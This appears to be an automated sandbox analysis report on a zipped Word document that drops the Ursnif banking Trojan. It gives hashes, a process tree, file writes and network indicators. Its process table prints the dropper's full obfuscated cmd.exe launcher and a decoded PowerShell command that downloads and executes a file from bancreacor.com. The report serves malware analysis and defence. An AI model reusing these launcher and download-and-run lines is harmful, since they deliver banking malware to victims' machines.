File name: | VIRUS SAMPLE.zip |
Full analysis: | https://app.any.run/tasks/c3ffc11f-fff8-48cd-bfb6-6813e67e24ce |
Verdict: | Malicious activity |
Threats: | Ursnif is a banking Trojan that usually infects corporate victims. It is based on an old malware but was substantially updated over the years and became quite powerful. Today Ursnif is one of the most widely spread banking Trojans in the world. |
Analysis date: | December 06, 2018, 13:15:06 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 1EB6759C647C4CD011CF2F4CFF6B384E |
SHA1: | 4D173E837CEFC3FFD34AF035191694AACE87FCC0 |
SHA256: | F6ABBE975C34E5E833124A7AB33C57D4CD0FE787F00FF8E74EFDE6474328257B |
SSDEEP: | 1536:URJjE3xXci+TnJHBF5ilXi/neYANGsFkWifiq0Fj1JrZp:I4BsNbfidiZLWi6LP |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | VIRUS SAMPLE/GemCastinc.doc |
---|---|
ZipUncompressedSize: | 102144 |
ZipCompressedSize: | 53942 |
ZipCRC: | 0xcb1f5074 |
ZipModifyDate: | 2018:12:05 10:54:06 |
ZipCompression: | Deflated |
ZipBitFlag: | - |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2852 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\VIRUS SAMPLE.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3004 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIa2852.14424\GemCastinc.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3896 | c:\CutjtrzzZwtcM\BvEbHsTCCFBwq\dXfUPCmDwMrjub\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set uc=sjkoqizYPzCRwVJfCm3\Sea6G.dKn/;lgr}I=WH D?FM-b,ch+${'vt1(uTNx8A:Up@Zy)0LE&&for %1 in (50,12,22,64,36,52,17,13,40,52,30,50,17,11,9,36,28,21,12,44,3,45,1,21,47,54,39,59,21,54,25,37,21,45,16,31,5,21,28,54,30,50,58,38,7,36,52,48,54,54,65,63,29,29,45,22,28,47,33,21,22,47,3,33,25,47,3,17,29,27,38,67,29,26,5,57,68,9,25,65,48,65,41,31,36,65,33,68,47,55,25,54,2,28,52,25,20,65,31,5,54,56,52,66,52,69,30,50,15,11,47,36,52,3,9,12,52,30,50,59,53,22,39,36,39,52,18,23,52,30,50,16,5,0,36,52,5,8,22,52,30,50,40,45,8,36,50,21,28,53,63,54,21,17,65,49,52,19,52,49,50,59,53,22,49,52,25,21,60,21,52,30,15,3,33,21,22,47,48,56,50,1,5,15,39,5,28,39,50,58,38,7,69,51,54,33,68,51,50,17,11,9,25,40,3,12,28,31,3,22,26,42,5,31,21,56,50,1,5,15,46,39,50,40,45,8,69,30,50,58,24,12,36,52,26,13,0,52,30,35,15,39,56,56,24,21,54,44,35,54,21,17,39,50,40,45,8,69,25,31,21,28,32,54,48,39,44,32,21,39,61,70,70,70,70,69,39,51,35,28,53,3,2,21,44,35,54,21,17,39,50,40,45,8,30,50,38,33,71,36,52,8,13,9,52,30,45,33,21,22,2,30,34,34,47,22,54,47,48,51,34,34,50,12,62,20,36,52,43,13,72,52,30,78)do set Em=!Em!!uc:~%1,1!&&if %1 geq 78 echo !Em:*Em!=!|FOR /F "tokens=2 delims=nb.gMI" %i IN ('ftype^^^|find "lM"')DO %i -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2420 | CmD /V:ON/C"set uc=sjkoqizYPzCRwVJfCm3\Sea6G.dKn/;lgr}I=WH D?FM-b,ch+${'vt1(uTNx8A:Up@Zy)0LE&&for %1 in (50,12,22,64,36,52,17,13,40,52,30,50,17,11,9,36,28,21,12,44,3,45,1,21,47,54,39,59,21,54,25,37,21,45,16,31,5,21,28,54,30,50,58,38,7,36,52,48,54,54,65,63,29,29,45,22,28,47,33,21,22,47,3,33,25,47,3,17,29,27,38,67,29,26,5,57,68,9,25,65,48,65,41,31,36,65,33,68,47,55,25,54,2,28,52,25,20,65,31,5,54,56,52,66,52,69,30,50,15,11,47,36,52,3,9,12,52,30,50,59,53,22,39,36,39,52,18,23,52,30,50,16,5,0,36,52,5,8,22,52,30,50,40,45,8,36,50,21,28,53,63,54,21,17,65,49,52,19,52,49,50,59,53,22,49,52,25,21,60,21,52,30,15,3,33,21,22,47,48,56,50,1,5,15,39,5,28,39,50,58,38,7,69,51,54,33,68,51,50,17,11,9,25,40,3,12,28,31,3,22,26,42,5,31,21,56,50,1,5,15,46,39,50,40,45,8,69,30,50,58,24,12,36,52,26,13,0,52,30,35,15,39,56,56,24,21,54,44,35,54,21,17,39,50,40,45,8,69,25,31,21,28,32,54,48,39,44,32,21,39,61,70,70,70,70,69,39,51,35,28,53,3,2,21,44,35,54,21,17,39,50,40,45,8,30,50,38,33,71,36,52,8,13,9,52,30,45,33,21,22,2,30,34,34,47,22,54,47,48,51,34,34,50,12,62,20,36,52,43,13,72,52,30,78)do set Em=!Em!!uc:~%1,1!&&if %1 geq 78 echo !Em:*Em!=!|FOR /F "tokens=2 delims=nb.gMI" %i IN ('ftype^^^|find "lM"')DO %i -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2088 | C:\Windows\system32\cmd.exe /S /D /c" echo $waU='mVD';$mRz=new-object Net.WebClient;$THY='http://bancreacor.com/KHZ/diuyz.php?l=pryc1.tkn'.Split('@');$fRc='ozw';$Nva = '36';$Cis='iPa';$DbP=$env:temp+'\'+$Nva+'.exe';foreach($jif in $THY){try{$mRz.DownloadFile($jif, $DbP);$TGw='dVs';If ((Get-Item $DbP).length -ge 80000) {Invoke-Item $DbP;$HrL='PVz';break;}}catch{}}$wAS='MVE';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
296 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=2 delims=nb.gMI" %i IN ('ftype^|find "lM"') DO %i -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2568 | C:\Windows\system32\cmd.exe /c ftype|find "lM" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2824 | C:\Windows\system32\cmd.exe /S /D /c" ftype" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2940 | find "lM" | C:\Windows\system32\find.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3644 | PowerShell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3004 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRBE93.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3644 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DNRL95MGAQS8B9WNZBJV.temp | — | |
MD5:— | SHA256:— | |||
3644 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19d4bb.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3004 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIa2852.14424\~$mCastinc.doc | pgc | |
MD5:F8E4936EE62898A40AF6055A3A296D1A | SHA256:234EFEAC23A88F272AF4480DFC9DC5039573ECF15F6B61CC36A9339D422D5D22 | |||
3644 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3004 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D239071FEE486EA567B6B4D558A1792B | SHA256:8D9C3ED9CEE77497780FE1736825F1B75832857562A6BCFB9F0C6A8933AD051F | |||
2852 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa2852.14424\GemCastinc.doc | document | |
MD5:EC9F7F27ECDDCAC7E2B333D5569F0DFF | SHA256:91D81454928A8C0225B6FC07916A40F7D0B2F4283BB2AF3F9CA685D30C752864 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3644 | powershell.exe | GET | 404 | 213.183.63.153:80 | http://bancreacor.com/KHZ/diuyz.php?l=pryc1.tkn | BG | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3644 | powershell.exe | 213.183.63.153:80 | bancreacor.com | Melbikomas UAB | BG | suspicious |
Domain | IP | Reputation |
---|---|---|
bancreacor.com |
| suspicious |